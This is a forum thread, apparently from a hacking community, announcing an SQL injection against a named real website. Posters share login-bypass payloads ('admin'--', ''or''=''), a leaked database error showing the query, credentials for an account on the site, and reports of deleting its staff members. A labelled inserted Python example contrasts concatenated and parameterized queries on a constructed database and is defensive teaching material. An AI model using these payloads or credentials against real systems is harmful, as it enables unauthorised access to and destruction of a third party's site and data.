escalation666

sql injection in http://www.fotoshop.ro

Posted

http://www.fotoshop.ro that's the target

Why? Because it sends spam

Vulnerability: sql injection

Poc: user:admin'--

Database error: Invalid SQL: SELECT u.id_user, u.id_user_group, u.status, u.email, ug.level, u.user_name FROM site_user u, site_user_group ug WHERE u.password='' AND u.user_name='admin'--' AND ug.id_user_group = u.id_user_group

MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND ug.id_user_group = u.id_user_group' at line 5)

I'm feeling too lazy these days to try to find out the admin password.

Also, if you put 'or''=' as both user and password, you'll get a pleasant surprise.
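
Added example, not part of the original post or the site's code: the login query from the error message above, run against a constructed in-memory SQLite database (the site uses MySQL), once built by string concatenation and once with bound parameters. Table and column names come from the error message; the function names, rows and secrets are constructed for illustration.

```python
import sqlite3

# Query text as shown in the error message; only the two values vary per request.
QUERY = ("SELECT u.id_user, u.id_user_group, u.status, u.email, ug.level, u.user_name "
         "FROM site_user u, site_user_group ug "
         "WHERE u.password={pw} AND u.user_name={user} "
         "AND ug.id_user_group = u.id_user_group")


def make_db():
    """Constructed sample schema and rows (not the site's data)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE site_user_group (id_user_group INTEGER PRIMARY KEY, level INTEGER);
        CREATE TABLE site_user (id_user INTEGER PRIMARY KEY, id_user_group INTEGER,
            status INTEGER, email TEXT, user_name TEXT, password TEXT);
        INSERT INTO site_user_group VALUES (1, 10), (2, 1);
        INSERT INTO site_user VALUES
            (1, 1, 1, 'admin@example.test', 'admin', 'sample-admin-secret'),
            (2, 2, 1, 'user@example.test', 'user1', 'sample-user-secret');
    """)
    return db


def login_concatenated(db, user, password):
    """Form values pasted into the SQL text: quotes in the input become SQL syntax."""
    sql = QUERY.format(pw="'" + password + "'", user="'" + user + "'")
    return db.execute(sql).fetchone()


def login_parameterized(db, user, password):
    """Form values bound as parameters: they are only ever compared as strings."""
    sql = QUERY.format(pw="?", user="?")
    return db.execute(sql, (password, user)).fetchone()


if __name__ == "__main__":
    db = make_db()
    # Second pair is the input quoted in the post; the first is a normal login.
    for user, pw in [("admin", "sample-admin-secret"), ("'or''='", "'or''='")]:
        print(repr(user),
              "concatenated:", login_concatenated(db, user, pw) is not None,
              "parameterized:", login_parameterized(db, user, pw) is not None)
    # Password hashing is a separate fix; plaintext here only mirrors the query shape.
```

The 1064 message in the post also shows the application returning raw database errors to the visitor; those belong in a server-side log, with a generic failure page sent to the client.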

Posted

user: kadaj

pass: sugipula

excuse the password :)

this is in case the sql injection stops working for you

Posted

What I knew was that you take the page source, strip the java out of it so you can see what you type in the pass field, and put something like

" * or 1+1 -- " and whatever you want as user...I don't know if that's correct...if not, please correct me :P

Thanks anyway :P

Posted

gg flama!

christmas...that works too...you probably saw this in a video tutorial :)

it's useful to do this when you have to enter an email address as the username...and the javascript doesn't let you put something like dfdf@fdwfdw.com ;)

Posted
devianc3 wrote: it says the member doesn't exist.. did someone mess with this guy's user? :)

like.. change username? :P

I deleted everything that was in the "staff" group from the memberlist. I don't think it's a problem for us, more for the site owner :@

Posted
greeny wrote:
devianc3 wrote: it says the member doesn't exist.. did someone mess with this guy's user? :)

like.. change username? :P

I deleted everything that was in the "staff" group from the memberlist. I don't think it's a problem for us, more for the site owner :@

ugh, all you kids are ever set on is destroying things :))
